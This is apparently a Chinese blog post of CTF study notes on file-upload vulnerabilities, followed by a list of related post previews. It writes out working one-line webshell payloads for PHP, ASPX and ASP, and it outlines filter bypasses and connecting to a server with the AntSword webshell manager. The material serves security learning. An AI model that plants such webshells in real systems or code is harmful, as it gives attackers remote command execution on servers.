ctf文件上传基本思路+例题

最新推荐文章于 2024-11-25 10:34:23 发布
最新推荐文章于 2024-11-25 10:34:23 发布
阅读量4.2k 收藏 10
点赞数 2
分类专栏: ctf记录 文章标签: 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/limenzzz/article/details/124130712
版权

目录

简介

一句话木马

蚁剑

例题 

总结思路

附言

简介

文件上传本质上就是将文件传输到服务器时没有做好检测和过滤,导致可上传恶意程序到服务器,从而获得后台权限来干点坏事。一般这个恶意脚本文件称为webshell,通过webshell我们可以查看服务器的目录结构或文件,以及来执行一些系统指令。小马和大马,简单来说,大马是多功能,危害大,体积大的木马,小马是隐蔽性强,体量小,更方便的小木马。一句话木马就属于小马,所以较易突破防护,而大马极易被过滤。

一句话木马

首先通过看一些题解和博客,发现一句话木马要根据语言的不同来考虑如何构建。比如

php:

<?php @eval($_POST[value]);?>

<?php fputs( fopen('xie.php','w') , '<? php eval($_POST[xie]) ?>' ) ; ?>
将当前目录下创建xie.php文件,并且将一句话木马写入xd.php中

(这里再转一个更多方式的一句话木马构造方式)

PHP一句话木马之小马 - 简书

aspx(asp.net):

<%@ Page Language=“Jscript”%>
<%eval(Request.Item[“value”])%>

asp:

<%execute(request(“v”))%>

蚁剑

当然这里就不得不提到蚁剑和菜刀,我使用的是蚁剑(当前中国菜刀已停止更新,最新版也有bug),那就以蚁剑为例。

安装教程:中国蚁剑安装教程_rab3it的博客-优快云博客_中国蚁剑

例题 

 在这里以攻防世界的webshell为例

 

很明显的一句话木马eval为执行括号中指令。而shell在我的理解中和sql的注入点差不多,可以通过改变shell的值来构造一些代码并执行。也就是说可以将shell视为后门。

蚁剑中的连接密码应该就是指这个后门的值,而蚁剑能通过改变这个值来对服务器进行管理。

 

 登入后即可看到flag

 

总结思路

1.构造一句话木马

2. 注意过滤和防护,必要时使用文件,base64等知识绕过

3.使用万能的蚁剑。

附言

文件上传的题还得多刷寄道,然后做个集合。还是那句话吧,希望自己不要鸽了吧。

希望自己不要这么菜吧   _(:з」∠)_   ----L1men2

ctf文件上传
Zheng_Jay的博客
11-15 4390
客户端校验 最简单的文件校验是本地js校验,一般都是要求只能上传jpg,png,gif图片格式: 应对措施:在本地禁用js。 服务端校验 服务端校验比较棘手一点。 MIME类型校验 虽然我们在客户端同过禁用js上传了文件,但服务端还会再对文件类型进行校验,并且校验的是MIME。 我们在开发者工具中,虽然看到文件发送成功: 但如果服务端对我们请求的数据中的MIME类型进行校验,发现并非image类型,仍会丢弃。 所以,我们要修改请求包中的MIME类型(使用burp suit),常见的MIME类型:
CTF从入门到提升(九)文件上传以及相关例题分享
anquanniu的博客
09-04 3815
文件上传主要是配合一些漏洞的利用,普遍意义上的文件上传是指将信息从个人计算机传送至中央计算机,也就是我们所说的远程计算机,对站点来说,就是传到运行网站的服务器上。一般网站都有自己的逻辑,比如在网站的注册页面,你想要上传个头像,网站只需要你上传头像,而不是传其他类型的文件。 CTF上传文件的目的是get shell,我们最终目的是拿到题目的flag,如果说存在一个上传的地方,很有可能它的目的就...
CTF文件上传
博客
07-25 838
练习平台 GitHub - c0ny1/upload-labs: 一个想帮你总结所有类型的上传漏洞的靶场 https://github.com/c0ny1/upload-labs 参考链接 Upload-labs文件上传(11-19) - tdcoming’blog QQ group 906755997 - 优快云博客 https://blog.youkuaiyun.com/qq_29647709/...
CTF-文件上传
weixin_44770698的博客
12-18 449
CTF练习
CTF文件上传(知识点+例题)(1)
qq_53099119的博客
03-23 7409
有的站点会出现仅进行了前端校验的情况(一切在前端做的安全防护,都是耍流氓),由于前端页面的源码是我们可以随意更改的,因此可以通过找到进行过滤的指令,更改成我们想要的功能即可。假设接下来就可以上传一个名为1.png的木马文件,植入后门,将其上传后,该文件虽文件后缀名为png,但会被当作php类型的文件进行解析,其中的一句话木马也能够被正常执行。因此,通过使用.user.ini,我们可以任意指定包含一个文件,这个文件可以是我们自己上传的木马文件,从而通过该木马文件提供后门来获取当前服务器的webshell。
CTF自学-文件上传(1)
m0_61926696的博客
10-17 508
也就是常说的一句话木马,其中$_POST也是php的超全局数组,用于存储客户端通过POST方式提交的内容,后面的'c'是与客户端约定的key,eval()函数则可以将其中的内容当作php代码执行,于是这句话就实现了在客户端通过post方法提交php代码并使服务器执行的功能。前面的@可以屏蔽报错信息。文件上传攻击,其核心就是利用服务端执行php文件的特点,通过向服务器上传一段恶意的php代码并使其执行来达到窃取服务器信息甚至获取服务器权限的目的。提交文件后访问文件路径,可以看到php文件被成功执行。
CTFWEB·通过CTFshow的例题来学习信息收集类题目的题型及对应做法
qq_54502707的博客
12-18 2211
大家好,这里是KOKO师傅~ WEB方向最简单的莫过于信息收集类型题目,我们以CTFshow的相关题目作为例题对这一类型的题目进行一个模块的针对练习!
CTF数据分析题详解
qq_68163788的博客
01-04 2643
CTF(Capture The Flag)比赛中,数据分析题通常涉及对提供的数据集进行分析、处理和提取有用信息的挑战。这些数据集可能是文本文件、网络流量、日志文件、加密数据等。解决数据分析题需要参赛者具备数据处理、编程和分析技能。由于每个CTF比赛的数据分析题目都有不同的特点和要求,因此解决方法也各有不同。通常需要参赛者具备良好的编程能力、数据分析能力和创新思维来解决这类挑战。
php反序列化1_常见php序列化的CTF考题
最新发布
书山有路勤为径,学海无涯苦作舟
11-25 1775
本质上serialize()和unserialize()在php内部的实现上是没有漏洞的,漏洞的主要产生是由于应用程序在处理对象,魔术函数以及序列化相关问题时导致的。当传给unserialize()的参数可控时,那么用户就可以注入精心构造的payload当进行反序列化的时候就有可能会触发对象中的一些魔术方法,造成意想不到的危害。__toString() 是魔术方法的一种,具体用途是当一个对象被当作字符串对待的时候,会触发这个魔术方法以下说明摘自PHP官方手册。
CTF-web题型知识随记?
keep_reading的博客
09-21 878
文章目录工具集常用套路总结常见题型解题技巧php弱类型绕WAF 工具集 御剑:网站后台 AWVS:扫描web漏洞 常用套路总结 1.查看源代码 2.查看HTTP数据包 http请求/响应 使用抓包工具burpsuite查看HTTP请求/相应头部 3.修改或添加HTTP请求头伪造客户端信息 4.web源码泄露 (1)vim源码泄露(线上ctf常见) 思路:如果发现页面提示有vi或vim,说明swp文件泄露 地址: /.index.php.swp 或 /index.php~ 恢复文件:vim -r ind
ctfshow---文件上传
fainpo的博客
04-10 741
来到文件上传了。
[HXPCTF 2021]includer‘s revenge
rev1ve的博客
11-12 618
这种情况下我们还是可以在对应的 /proc/PID/fd 下找到我们删除的文件 ,虽然显示是被删除了,但是我们依然可以读取到文件内容,所以我们可以直接用php 进行文件包含。但是最后一个问题就是,既然我们要去包含 Nginx 进程下的文件,我们就需要知道对应的 pid 以及 fd 下具体的文件名,怎么才能获取到这些信息呢?这时我们就需要用到文件读取进行获取 proc 目录下的其他文件了,这里我们只需要本地搭个 Nginx 进程并启动,对比其进程的 proc 目录文件与其他进程文件区别就可以了。
ctf常见文件上传
qq_61988806的博客
03-03 5866
ctf文件上传
ctf-web入门-文件上传
whisper921的博客
05-28 4517
Web 151 考点:后端无验证,前端校验 查看源码可以发现只能上传png图片 修改为php 写一个php文件上传一句话木马 可以发现已经成功上传 查看上级目录发现可疑文件 查看flag.php文件内容得出flag 得到flag Web 152 考点:绕过前端校验 解题思路: 经过一系列的方法测试上题的解题方法并不适用于本题。直接改前端,后端会校验,文件不合格。那就抓包一下。 将Content-Type内容修改成image/png,重发,发现成...
小白的CTF之路之文件上传(二)
glass_york的博客
01-13 380
文件上传
ctf技能树----文件上传
qq_44418229的博客
05-10 1225
ctf技能树----文件上传
CTF自学-文件上传(3)
m0_61926696的博客
10-25 416
即Multipurpose Internet Mail Extensions(多用途互联网邮件扩展)。用于传输不同类型的文件。该题中后端会检查MIME协议中文件类型是否合法。
网络安全最全CTFshow web入门——文件上传_ctfshow文件上传(1)
2401_84301853的博客
05-04 2554
日志包含过滤关键字是log所以用拼接绕过上传完.user.ini和图片后访问网站然后修改ua头信息。
CTFshow Web入门 文件上传
m0_62905261的博客
10-05 951
CTFshow Web入门 文件上传
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值